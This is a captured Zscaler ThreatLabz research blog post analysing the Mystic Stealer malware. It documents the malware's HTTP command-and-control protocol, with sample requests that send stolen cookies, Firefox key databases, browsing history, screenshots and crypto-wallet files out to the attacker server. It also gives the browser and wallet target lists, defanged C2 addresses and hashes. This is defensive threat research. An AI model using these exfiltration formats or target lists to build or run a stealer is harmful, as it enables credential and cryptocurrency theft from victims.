www.zscaler.com Open in urlscan Pro
2606:4700::6812:1c4a  Public Scan

URL: https://www.zscaler.com/blogs/security-research/mystic-stealer-revisited
Submission: On October 26 via api from DE — Scanned from DE

Form analysis 3 forms found in the DOM

<form class="topSearch_searchInputWrapper__pYYBt" __bizdiag="107944136" __biza="W___"><input type="text" name="query" class="topSearch_searchInput__N_10L" placeholder="What are you looking for?" aria-label="What are you looking for?"
    aria-hidden="true" tabindex="-1" value=""></form>

<form class="marketoForm_root__OkMwH marketoForm_variant_cta_module__RcBac" id="mktoForm_7971" style="opacity:0" __bizdiag="196539198" __biza="W___"></form>

<form class="marketoForm_root__OkMwH marketoForm_variant_footer__vL4cA footer-subscription" id="mktoForm_1944" style="opacity:0" __bizdiag="196360362" __biza="W___"></form>

Text Content

This site uses JavaScript to provide a number of functions, to use this site
please enable JavaScript in your browser.
Live Global Events: Secure, Simplify, and Transform Your Business.
See Agenda and Locations
Close
OpenSearch
CXO REvolutionariesCareersPartnersSupport
ShowContact UsOptions
Get in touch1-408-533-0288Chat with us
ShowSign InOptions
admin.zscaler.netadmin.zscalerone.netadmin.zscalertwo.netadmin.zscalerthree.netadmin.zscalerbeta.netadmin.zscloud.netZscaler
Private Access

Home
The Zscaler ExperienceProducts & SolutionsPlatformResourcesCompany
Request a demoopen search
open navigation
The Zscaler Experience

Zscaler: A Leader in the 2023 Gartner® Magic Quadrant™ for Security Service Edge
(SSE)

Get the full report

Your world, secured

Experience the transformative power of zero trust.



The Zscaler Difference

The Zscaler Difference
Experience the World’s Largest Security Cloud
Customer Success Stories
Analyst Recognition
Machine Learning and AI at Zscaler
Reduce Your Carbon Footprint

Zero Trust Fundamentals

Zero Trust Fundamentals
What is Zero Trust?
What Is Security Service Edge (SSE)?
What Is Secure Access Service Edge (SASE)?
What Is Zero Trust Network Access (ZTNA)?
What Is Secure Web Gateway (SWG)?
What Is Cloud Access Security Broker (CASB)?
What Is Cloud Native Application Protection Platform (CNAPP)?
Zero Trust Resources
Products & Solutions
Secure Your Users

Provide users with seamless, secure, reliable access to applications and data.


Secure Your Workloads

Build and run secure cloud apps, enable zero trust cloud connectivity, and
protect workloads from data center to cloud.


Secure Your IoT and OT

Provide zero trust connectivity for IoT and OT devices and secure remote access
to OT systems.




Products

Products

Transform your organization with 100% cloud native services

Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Data Protection (CASB/DLP)
Digital Experience (ZDX)
Posture Control
Partner IntegrationsIndustry and Market Solutions

Solution Areas

Solution Areas

Propel your business with zero trust solutions that secure and connect your
resources

Stop Cyberattacks
Protect Data
Zero Trust App Access
VPN Alternative
Accelerate M&A Integration
Optimize Digital Experiences
Zero Trust Branch Connectivity
Build and Run Secure Cloud Apps
Zero Trust Cloud Connectivity
Zero Trust for IoT/OT
Zero Trust for Private 5G
Find a product or solution
Platform
Zero Trust Exchange Platform

Learn how Zscaler delivers zero trust with a cloud native platform that is the
world’s largest security cloud

Zero Trust Exchange PlatformTitle Link


Transform with Zero Trust Architecture

Transform with Zero Trust Architecture

Propel your transformation journey

Secure Digital Transformation
Network Transformation
Application Transformation
Security Transformation

Secure Your Business Goals

Secure Your Business Goals

Achieve your business and IT initiatives

Ensure Secure Business Continuity
Accelerate M&A and Divestitures
Recession-Proof Your Enterprise
Secure Your Hybrid Workforce
Download Zscaler Client Connectors
Resources
Learn, connect, and get support.

Explore tools and resources to accelerate your transformation and secure your
world

Learn, connect, and get support.Title Link

Amplifying the voices of real-world digital and zero trust pioneers

Visit now


Resource Center

Resource Center

Stay up to date on best practices

Resource Library
Blog
Customer Success Stories
Webinars & Demos
Zpedia

Events & Trainings

Events & Trainings

Find programs, certifications, and events

Upcoming Events
Zenith Live
Zscaler Academy
Interactive Zscaler Whiteboard Workshop

Security Research & Services

Security Research & Services

Get research and insights at your fingertips

ThreatLabz Analytics

Tools

Tools

Tools designed for you

Security Preview
Security and Risk Assessment
Security Advisory Updates
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator

Community & Support

Community & Support

Connect and find support

Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Download Zscaler Client Connector

Industry & Market Solutions

Industry & Market Solutions

See solutions for your industry and country

Public Sector
Healthcare
Financial Services
Education
See all

Resource Center

Resource Center

Stay up to date on best practices

Resource Library
Blog
Customer Success Stories
Webinars & Demos
Zpedia

Events & Trainings

Events & Trainings

Find programs, certifications, and events

Upcoming Events
Zenith Live
Zscaler Academy
Interactive Zscaler Whiteboard Workshop

Security Research & Services

Security Research & Services

Get research and insights at your fingertips

ThreatLabz Analytics

Tools

Tools

Tools designed for you

Security Preview
Security and Risk Assessment
Security Advisory Updates
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator

Community & Support

Community & Support

Connect and find support

Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Download Zscaler Client Connector

Industry & Market Solutions

Industry & Market Solutions

See solutions for your industry and country

Public Sector
Healthcare
Financial Services
Education
See all
Company
About Zscaler

Discover how it began and where it’s going

Partners

Meet our partners and explore system integrators and technology alliances

News & Announcements

Stay up to date with the latest news

Leadership Team

Meet our management team

Partner Integrations

Explore best-in-class partner integrations to help you accelerate digital
transformation

Investor Relations

See news, stock information, and quarterly reports

Environmental, Social & Governance

Learn about our ESG approach

Careers

Join our mission

Press Center

Find everything you need to cover Zscaler

Compliance

Understand our adherence to rigorous standards

Zenith Ventures

Understand our adherence to rigorous standards


ZSCALER BLOG

Get the latest Zscaler blog updates in your inbox

Subscribe
Security Research


MYSTIC STEALER REVISITED

JAVIER VICENTE - Sr. Staff Security Researcher
October 25, 2023 - 21 min read



Threatlabz Research


Contents

 1. Introduction
 2. Key Takeaways
 3. Technical Analysis
 4. Communications
 5. Conclusion
 6. Cloud Sandbox
 7. Indicators of Compromise (IoCs)
 8. Appendix
 9. More blogs

Copy URL
Copy URL



INTRODUCTION

Mystic Stealer is a relatively new downloader and information stealer that
emerged in early 2023. The malware harvests data from a large number of web
browsers and cryptocurrency wallet applications. Mystic can also be used to
steal Steam game credentials and arbitrary files from an infected system. Mystic
stands out for the level of obfuscation and improvements with each new version
of the malware. The code continues to evolve and expand the data theft
capabilities and the network communication was updated from a custom binary
TCP-based protocol to an HTTP-based protocol. The shift to HTTP may be due to
Mystic Stealer failing to beacon back to a C2 server in corporate environments,
which frequently block network traffic on non-standard ports. The new
modifications have led to increased popularity with criminal threat actors
leveraging its loader functionality to distribute additional malware families
including RedLine, DarkGate, and GCleaner.

In this blog, we will analyze the latest updates to Mystic Stealer as a
follow-up to our previous report.


KEY TAKEAWAYS

 * Mystic Stealer is an information stealer that was first advertised in April
   2023, which targets nearly 40 web browsers and more than 70 browser
   extensions.
 * Mystic Stealer has been regularly updated with improvements to its code
   obfuscation, configuration, and methods of communication.
 * The malware’s command and control (C2) communications have been updated from
   a custom encrypted binary protocol to HTTP.
 * Mystic Stealer has added loader functionality in recent versions to
   complement its information stealing abilities.
 * Mystic Stealer has been used by numerous threat groups that leverage it to
   distribute second-stage malware payloads including RedLine, DarkGate, and
   GCleaner.


TECHNICAL ANALYSIS

The latest variant of Mystic Stealer has introduced some notable changes in both
the behavior of the malware and in the obfuscation. The entry point of the
malware is very similar to the older variant. The malware exits if the current
date is older than a specific hardcoded date. Figure 1 shows a comparison of the
main function between the previous variant and the current variant.

Figure 1: Comparison of the WinMain function for the current and previous Mystic
variants

In the latest variant of Mystic Stealer, the decryption of the malware C2s has
been moved to a sub-function that is executed after the expiration date
(probably to avoid leaking the C2s in memory if this time check fails).


EMBEDDED C2 CONFIGURATION

The algorithm used to decrypt the list of C2 is the same custom XTEA-based
algorithm as the previous variant. However, after the custom XTEA layer has been
decrypted, there is a sequence of HTTP C2s, separated by a “|” delimiter. The C2
path is stored among the list of obfuscated strings that are constructed and
decoded using the stack as shown in Figure 2.

Figure 2. Mystic Stealer C2 path obfuscation


INFORMATION STEALING CONFIGURATION

In the previous Mystic Stealer variant, the target lists for web browsers,
extensions (and their IDs), and cryptocurrency applications were embedded and
obfuscated in the malware. In recent versions, the application target list is
now downloaded from the C2 server instead of being hardcoded, as we will examine
in the following section.


COMMUNICATIONS

In the latest Mystic Stealer variant, all communications between the infected
system and the C2 server are performed using HTTP POST requests. Unlike the
previous variant that used RC4 to encrypt a custom binary TCP-based protocol,
the latest variant does not implement any form of encryption. The data sent in
the POST query is Base64 encoded, as shown below:

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="<name>"


BASE64(<data>)
--<boundary>


--------------------------------------------------------------------------------

The response data from the server is also encoded in Base64. The response starts
with “OK\r\n” and is followed by any data returned by the C2 server for the
specific query.

--------------------------------------------------------------------------------

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <rest of data for the specific command, if necessary>)

--------------------------------------------------------------------------------

 


REGISTRATION

The infected system (bot) starts communication with the C2 server by sending a
POST request with data containing a variable named hwid, which includes a Base64
encoded bot ID generated based on information from the victim’s machine. A
second variable with the name build contains the botnet ID, a value that is
hardcoded in the binary of the malware. Once the C2 receives these initial two
packets, the bot is registered.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="hwid"

BASE64(0123456789ABCDEF123456)
--<boundary>
Content-Disposition: form-data; name="build"

BASE64(botnet_id)
--<boundary>--

--------------------------------------------------------------------------------

The C2 server generates and returns a session token (a 64 byte lowercase
hexadecimal string) that will be used in subsequent packets, together with a set
of binary flags that indicates which actions should be performed (take a
screenshot, steal browser credentials, steal cryptocurrency wallets, etc).

--------------------------------------------------------------------------------

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <token>1|1|1|1|0|1|1|1|0|1|1)

--------------------------------------------------------------------------------

When the bot submits information to the C2 server, it sends a POST request with:

 * A filename variable containing the name of the file being submitted, Base64
   encoded
 * A file variable with the content of the file, also Base64 encoded
 * A token variable with the session token from the registration request

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("example.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of example.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--


--------------------------------------------------------------------------------

If the request is valid, the server answers with an OK response.

After registration, the bot sends information about the infected system via a
file named SystemInformation.txt that contains information similar to the
following:

--------------------------------------------------------------------------------

Build mark: zzzz
IP: {ip}
File Location: C:\Users\xxxx\AppData\Local\Temp\aaaa\bbbb.exe
UserName: xxxx
ComputerName: XXXX
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}
HWID: 0123456789ABCDEF012345
Current language: English (United States)
ScreenSize: 1792x1120
Operation System: Windows 10 Pro x64

Available KeyboardLayouts: 
English (United States)

Hardwares: 
CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz
GPU: VMware SVGA 3D
RAM: 4293898240ll


--------------------------------------------------------------------------------

 


INFORMATION STEALING

Once Mystic Stealer has registered and reported the infected system information,
the binary flags from the C2 server determine whether to conduct data theft and
load additional malware payloads. Mystic Stealer sends HTTP POST requests for
specific target lists by specifying the value in a msg variable.

BROWSERS

Depending on the configuration, Mystic Stealer will steal data from
Chromium-based browsers by first requesting a target list from the C2 server.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("chromium-browsers")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--


--------------------------------------------------------------------------------

The Mystic Stealer C2 server will respond with a list of Chromium-based browsers
to target. The Appendix section shows the full list of browsers that have been
targeted.

--------------------------------------------------------------------------------

Citrio|%localappdata%\CatalinaGroup\Citrio\User 
Data|Coowon|%localappdata%\Coowon\Coowon\User 
Data|Liebao|%localappdata%\liebao\User 
Data|QIP Surf|%localappdata%\QIP Surf\User 
Data|Orbitum|%localappdata%\Orbitum\User 
Data|Comodo Dragon|%localappdata%\Comodo\Dragon\User 
Data|Amigo|%localappdata%\Amigo\User\User 
Data|Torch|%localappdata%\Torch\User Data|Yandex 
Browser|%localappdata%\Yandex\YandexBrowser\User 
Data|Comodo|%localappdata%\Comodo\User 
Data|360Browser|%localappdata%\360Browser\Browser\User 
Data|Maxthon3|%localappdata%\Maxthon3\User Data|K-Melon|...

--------------------------------------------------------------------------------

Each element of the list contains the name of the browser and the path where the
browser’s data is stored: 

--------------------------------------------------------------------------------

Browser name 1|Browser path 1|..............|Browser N|Browser path N

--------------------------------------------------------------------------------

Mystic Stealer also retrieves a list of browser extensions to target.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64(extensions)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

--------------------------------------------------------------------------------

The Mystic Stealer C2 server will return the browser extensions configuration.

--------------------------------------------------------------------------------

Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad|Guarda|hpglfhgfnhbgpjdenjgmdg
oeiappafln|EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac|Jaxx 
Liberty|cjelfplplebdjjenllpjcblmjkfcffne|BitApp 
Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi|iWallet|kncchdigobghenbbaddoj
jnnaogfppfj|Wombat|amkmjjmmflddogmhpjloimipbofnfjih|MEW 
CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|GuildWallet|nanjmdknhkinifnkgdcgg
cfnhdaammmj|Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig|Ronin 
Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|NeoLine|cphhlgmgameodnhkjdmkp
anlelnlohao|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|Liquality 
Wallet|kpfopkelmapcoipemfendmdcghnegimn|Terra 
Station|aiifbnbfobpmeekipheeijimdpnlpgpp|Keplr|dmkamcknogkgcdfhhbddcg
hachkejeap|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|...


--------------------------------------------------------------------------------

In this case, each element contains the name of the extension and the ID.

--------------------------------------------------------------------------------

Extension name 1|Extension ID 1|....|Extension name N|Extension ID N

--------------------------------------------------------------------------------

Next, the malware downloads the legitimate sqlite3.dll DLL from the C2 server.
This library is used to parse web browser SQLite database files.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("sqlite3")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

--------------------------------------------------------------------------------

The response is the sqlite3 DLL Base64 encoded, as shown below:

--------------------------------------------------------------------------------

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK BASE64(<sqlite3 file>))


--------------------------------------------------------------------------------

The stolen browser data (if any) is sent to the C2 server. For example, cookies
stolen from Microsoft Edge (which is Chromium-based) would be exfiltrated, as
shown below:

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64(“Cookies/Microsoft_Edge_Default.txt”)
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Cookies/Microsoft_Edge_Default.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--


--------------------------------------------------------------------------------

Depending on the configuration, Mystic Stealer will also retrieve a list
gecko-browsers to target.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("gecko-browsers")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--


--------------------------------------------------------------------------------

The configuration format is identical to the chromium-browser list.

--------------------------------------------------------------------------------

Firefox|%appdata%\Mozilla\Firefox\Profiles|Comodo 
IceDragon|%appdata%\Comodo\IceDragon\Profiles|BlackHawk|%appdata%\NET
GATE 
Technologies\BlackHawk\Profiles|Cyber
fox|%appdata%\8pecxstudios\Cyberfox\Profiles|K-Meleon|%appdata%\K-Meleon\Profiles|Icecat|%appdata%\Mo
zilla\icecat\Profiles

--------------------------------------------------------------------------------

Mystic Stealer will collect a number of database files from Firefox-based
browsers containing cookies, certificates, keys, etc., as shown below:

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Gecko/Firefox/<profile>.default/key4.db")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Gecko/Firefox/<profile>.default/key4.db>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Gecko/Firefox/<profile>.default/cert9.db")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Gecko/Firefox/<profile>.default/cert9.db>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Cookies/Firefox_<profile>.default.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Cookies/Firefox_<profile>.default.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

--------------------------------------------------------------------------------

If the browser history configuration flag (position 4) is set to 1, Mystic
Stealer also sends the victim’s browsing history.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("History/Firefox_8qjvd3qg.default-release.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of History/Firefox_8qjvd3qg.default-release.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

--------------------------------------------------------------------------------

The browser history file contains the website title (if available) and the URL
as shown below:

--------------------------------------------------------------------------------

Title: <Title1>
Url: <url1>

===============

Title: <Title2>
Url: <url2>

===============

...

===============

Title: <TitleN>
Url: <urlN>

===============

--------------------------------------------------------------------------------

 

SCREENSHOTS

If the screenshot configuration flag (position 8) is set to 1, Mystic Stealer
captures and sends a screenshot of the victim’s desktop.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Screenshot.jpeg")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Screenshot.jpeg>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

--------------------------------------------------------------------------------

 

FILES

Mystic Stealer also downloads a list of files to be stolen from the victim.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("files")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--


--------------------------------------------------------------------------------

The Mystic Stealer C2 server returns a list of target files and directories to
steal. For example, ThreatLabz has observed this feature used to steal
cryptocurrency wallets as shown below:

--------------------------------------------------------------------------------

Wallets/Jaxx 
Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveld
b|*.*|0|Wallets/Atomic|%appdata%\atomic\Local 
Storage\leveldb|*.*|0|Wallets/Binance|%appdata%\Binance|app-store.jso
n,simple-storage.json,.finger-print.fp|0|Wallets/Co
inomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0|Wallets/Exo
dus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info
.seco|1|Wallets/Bitcoin 
Core|%appdata%\Bitcoin\wallets|wallet.dat|1|Wallets/Bitcoin Core 
Old|%appdata%\Bitcoin|*wallet*.dat|0|Wallets/Dogecoin|%appdata%\Bitco
in\wallets|*wallet*.dat|0|Wallets/Raven 
Core|%appdata%\Raven|*wallet*.dat|0|Wallets/Daedalus 
Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0|Wallets/Blockstream 
Green|%appdata%\Blockstream\Green\wallets|*.*|1|Wallets/Wasabi 
Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0|Wallets/Ethereu
m|%appdata%\Ethereum|keystore|0|Wallets/Electrum|%appdata%\Electrum\w
allets|*.*|0|Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
|Wallets/Electron 
Cash|%appdata%\ElectronCash\wallets|*.*|0|Wallets/MultiDoge|%appdata%
\MultiDoge|multidoge.wallet|0|Wallets/Jaxx Desktop 
Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0

--------------------------------------------------------------------------------

The format for each targeted file is shown below:

--------------------------------------------------------------------------------

Directory name|Location on disk|Target files mask|Flag

--------------------------------------------------------------------------------

The flag parameter indicates whether Mystic Stealer should recursively search
the target directory. Once finished, a “done” msg is sent, to indicate the file
stealing task is finished.

LOADER

A “loader” msg can be sent by Mystic Stealer to the C2 server to request
additional second-stage malware payloads, as shown below:

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("loader")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK |1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN))


--------------------------------------------------------------------------------

The response to the loader request is an initial Base64 encoded layer containing
an OK response with a set of one or more Base64 encoded executables:



Figure 3: Base64 encoded executables downloaded by Mystic Stealer

The packet follows this format:

--------------------------------------------------------------------------------

|1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN)

--------------------------------------------------------------------------------

The parameter that precedes the Base64 encoded executable does not appear to be
currently used, although it may indicate a potential feature that has yet to be
implemented such as whether to write the binary to disk or inject it into
another process. After downloading and executing these binary payloads, Mystic
Stealer sends a final POST request with the message “loadercode”. The C2 server
will then return an empty response.


DEBUG BUILDS

Zscaler ThreatLabz has found recent samples compiled in September and October
2023, which contain plaintext strings that typically are obfuscated in other
samples:

Figure 4: Mystic Stealer debug version plaintext strings

In addition, these samples have string references with full file paths (instead
of a relative path like ..\\chromiumbrowsers.cpp in non-debug samples) to the
original C++ code. Interestingly, the username in these full paths is will.
ThreatLabz suspects these samples are compiled from code that is still in
development where they could be testing improvements and new features.


CONCLUSION

Even though Mystic Stealer is a relatively new information stealing malware,
ThreatLabz has observed a significant increase in threat actors leveraging it to
deploy additional malware. The developer behind Mystic Stealer is continuously
modifying and improving the code, and the malware is quickly evolving. The C2
communication protocol used by Mystic Stealer has switched from a custom binary
protocol to an HTTP-based protocol, likely to improve beaconing from infections
in corporate environments that leverage firewalls to filter suspicious network
traffic. Based on the number of new Mystic Stealer samples and C2 panels, the
malware is likely to continue to pose a threat to organizations.

In addition to staying on top of these threats, Zscaler's ThreatLabz team
continuously monitors for new threats and shares its findings with the wider
community.


CLOUD SANDBOX

Zscaler’s multilayered cloud security platform detects indicators related to
Mystic Stealer at various levels.




INDICATORS OF COMPROMISE (IOCS)

HashFirst SeenExpiration DateBotnet IDC2

6203249bebf7248535ff5ef70a7c5a57

688b399d91ac63c9d73441af6e65f184

2023-10-08 08:36:29 UTC2023-11-09T20:02:2115

hxxp://171.22.28[.]235/loghub/master

7eb8617d09f204dd40541a000f98810

19ff103ff330cb0e7aebb8c3a160cfd26

2023-09-29 15:30:00 UTC2023-10-26T11:48:42Chung

hxxp://194.87.31[.]123/loghub/master

21a8db193093caf6acbcd14ba64c9

8a1c9f16998cade8f60fa0fb4dc63e33bd2

2023-09-18 21:36:22 UTC2023-09-22T12:35:08mema

hxxp://5.42.92[.]211/loghub/master

7003eadaef73ac1f2e0f0a86a3d1f57

92a5dde3a45ba71e095861b55059b3780

2023-09-07 07:53:28 UTC2023-09-12T20:08:32tresk

hxxp://5.42.92[.]211/loghub/master

00fe26cfe465740e61b99f105bcf251

6ff49e117f23f4b508d5256c57fa3fc66

 

2023-06-26 05:51:47 UTC2023-07-24T18:48:13sup

hxxp://188.40.116[.]251:8005/loghub/master


 


APPENDIX


DECRYPTED MALWARE STRINGS

 * %08lX%04lX%lu
 * %ix%i
 * %ls %ls
 * %ls [%ls %d] ERROR in %s, line %d, function %s. %s
 * %ls\\%ls
 * %ls\\%ls\\Local State
 * %ls\\*
 * %ls\\Web Data
 * %ls\\cookies.sqlite
 * %ls\\formhistory.sqlite
 * %ls\\places.sqlite
 * %s/%s
 * %userprofile%\\Telegram Desktop\\tdata
 * &&\" **(# +
 * &0'fg{199
 * (ov_(ov
